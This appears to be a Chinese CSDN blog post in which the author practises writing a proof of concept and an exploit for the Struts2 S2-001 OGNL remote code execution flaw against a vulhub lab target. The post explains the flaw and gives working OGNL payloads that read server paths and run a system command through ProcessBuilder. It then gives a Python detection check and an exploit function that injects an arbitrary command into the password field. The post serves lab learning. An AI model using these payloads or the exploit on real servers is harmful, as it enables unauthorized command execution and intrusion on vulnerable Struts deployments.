s2-001远程执行漏洞靶机练写poc和exp

最新推荐文章于 2023-07-09 15:01:44 发布
最新推荐文章于 2023-07-09 15:01:44 发布
阅读量430 收藏 2
点赞数 2
文章标签: python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rlenew/article/details/110498924
版权

最近在练写poc和exp,在github上的vulhub找到了struts2全系列漏洞,打算复现来练写poc和exp。
安装好环境如下:
靶机地址:192.168.6.217:8080

该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value}
进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value}
对提交的数据递归执行OGNL 表达式解析,所以直接构造 Payload 进行命令执行

在这里插入图片描述在密码框输入poc验证%{1+33}
在这里插入图片描述
在bp中抓包得到
在这里插入图片描述探寻tomcat路径

%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}

在这里插入图片描述得到路径在这里插入图片描述获取web路径

%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}

在这里插入图片描述命令执行

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

在这里插入图片描述接下来利用这些编写相关环境的poc和exp

def s2_001(url):
    data = {
        'username': '1213',
        'password': '%{1+12}'
    }

    s = requests.post(url=url, data=data, headers=headers)
    soup = BeautifulSoup(s.text, 'lxml')
    flag = soup.find_all("input")
    flag1 = flag[1]
    if "13" in str(flag1):
        print("存在s2-001漏洞")
    else:
        pass

效果为
在这里插入图片描述

def s2_001exp(url, exec):
    data = {
        'username': '1212',
        'password': '%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"' +
                    exec + '"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}'
    }
    s = requests.post(url=url, data=data, headers=headers)
    soup = BeautifulSoup(s.text, 'lxml')
    getexec = soup.find("table")
    print(getexec)

exp的效果还没有处理好
在这里插入图片描述

0x 0101
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
S2-001 远程代码执行漏洞(漏洞复现)
m0_65454485的博客
09-10 184
1.漏洞描述该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行影响版本: Struts 2.0.0 - Struts 2.0.8。
如何自己动手编写漏洞POC
Ms08067安全实验室
01-30 5329
文章来源|MS08067 红队培训班 第5期本文作者:M0arnch(红队培训班5期学员)1.健全的请求框架需要注意的点1.1 忽略证书安全性发送请求时添加以下参数即可1.2 随机UA头...
简单的poc以及exp编写(入门篇)
热门推荐
LINGOVO的博客
12-18 1万+
本文中主要针对的是Web应用渗透中的漏洞,而与Web应用之间的交互大多是基于HTTP协议的。所以用到python中与HTTP协议相关的一些模块 一、何为POCEXP POC Proof of Concept中文意思是“观点证明”,是用来检测是否存在漏洞的脚本 EXP Exploit的中文意思是“漏洞利用”,是用来利用该漏洞的脚本 二、基础环境Python3 HTTP 方法 内容 GET 获取资源 POST 传输实体主体 PUT 传输文件 HEAD 获得响应报文首部
【研究】Struts2漏洞S2-001漏洞环境和POC
god_Zeo的安全博客
07-01 2106
【研究】Struts2漏洞S2-001漏洞环境和POC1.环境2.原理3.影响版本4.利用过程POC 1.环境 环境 https://github.com/vulhub/vulhub/blob/master/README.zh-cn.md 这个搭环境很方便快捷,具体可以看说明,很简单 2.原理 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{v...
poc练习-dvwa文件包含漏洞
qq_44248518的博客
02-24 156
poc练习-dvwa文件包含漏洞
行业文档-设计装置-自动换靶机和连体靶纸.zip
08-21
《自动换靶机和连体靶纸》是一个深入探讨工业自动化设计的专业文档,主要涵盖了自动换靶机与连体靶纸技术的相关知识。在当前制造业向着智能化、高效化发展的趋势下,这类设备的设计与应用成为了提升生产效率和产品...
exploit.tar(DC3靶机所需提权exp-1)
02-20
39772.zip
crasher.tar(DC3靶机所需提权exp-2)
02-20
DC3靶机所需提权exp
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Struts2 045漏洞S2-045漏洞利用工具python 视图版
03-07
Struts2 045漏洞S2-045漏洞利用工具python 视图版 执行python exp.py后 自动弹出对话框
Struts2漏洞S2-001复现
hklearner的博客
03-30 1690
Struts2 漏洞S2-001复现学习笔记 S2-001复现 原理:该漏洞因用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据中。如注册或登录页面,提交失败后一般会默认返回之前提交的数据,由于后端使用%{value}对提交的数据执行了一次OGNL 表达式解析,所以可以直接构造 Payload进行命令执行漏洞环境搭建 https://github.com/vulhub/vulhub/tree/master/struts2/
编写poc/exp从0到1
mingyqf的博客
03-03 907
相关概念: POC-EXP编写 一、简介: 编写pocexp并不是大佬们才会的,借助于某些框架,小白也可以编写自己的pocexp,并且实现批量刷SRC。 我们这里使用Pocsuite 3 来实现自己编写脚本 Pocsuite是由”知道创宇404实验室”打造的一款开源的远程漏洞测试框架,你可以直接使用它进行漏洞的验证与利用,也可以基于它进行POC/EXP的开发 安装模块 pip3 install -r requirements.txt -i https://pypi.tuna.tsinghua.e
XSS漏洞pocexp
bamanju0574的博客
09-01 892
poc <script>alert('xss')</script> 最简单常用的poc <a href='' onclick=alert('xss')>type</a> 页面出现一个按钮type,点击触发onclick,然后执行弹窗 <img src=http://1.1.1.1/a.ipg onerror=alert('...
Struts2 S2-046漏洞复现
最新发布
2301_76467680的博客
07-09 680
在xb中间加个空格选中后改为00,再发包。修改filename参数。成功实现远程命令执行
【vulhub】Structs2 S2-045 远程代码执行漏洞(CVE-2017-5638)
weixin_42884199的博客
12-07 539
前言 一、启动靶机 docker-compose build docker-compose up -d 二、构造payload payload1: Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vulhub',233*233)}.multipart/form-data 在请求头插入上述payload 三、漏洞利用 payload2: Content-Type:
OSCP练习:vulhub靶机pinkys-palace-v1
weixin_47311099的博客
10-26 1256
在/var/www/html/littlesecrets-main/ultrasecretadminf1l35 发现rsa密钥.ultrasecret。账密为pinkymanage/3pinkysaf33pinkysaf3,ssh登录。发现8080,但是403,31337端口是http代理 ,64666为ssh。直接访问403,配置代理,访问127.0.0.1:8080。执行后没有反应,加上一点参数发现会进行输出,但执行不了命令。这个长得就像个sql注入…尝试缓冲区溢出,输入废字符, 得到边界值为72。
漏洞复现 - - -Struts2(s2-045)远程命令执行漏洞
weixin_67503304的博客
08-22 7342
从源码的角度分析Struts2(s2-045)远程命令执行漏洞,利用java详细讲解造成漏洞的原因,包含了Structs2高危漏洞exp的扫描利用工具
【vulhub】Structs2 S2-046 远程代码执行漏洞(CVE-2017-5638)
weixin_42884199的博客
12-07 1016
前提 Apache Struts2存在远程代码执行漏洞,攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导致任意代码执行。 影响版本: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10 一、启动靶机 docker-compose build docker-compose up -d 二、
如何使用metasploit利用ms17-010漏洞对模拟靶机进行攻击
06-09
MS17-010漏洞是指Windows SMB远程代码执行漏洞,可以通过Metasploit利用这个漏洞对目标系统进行攻击。下面是攻击步骤: 1. 打开Metasploit控制台,输入`msfconsole`命令启动。 2. 搜索MS17-010漏洞模块,输入命令`...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值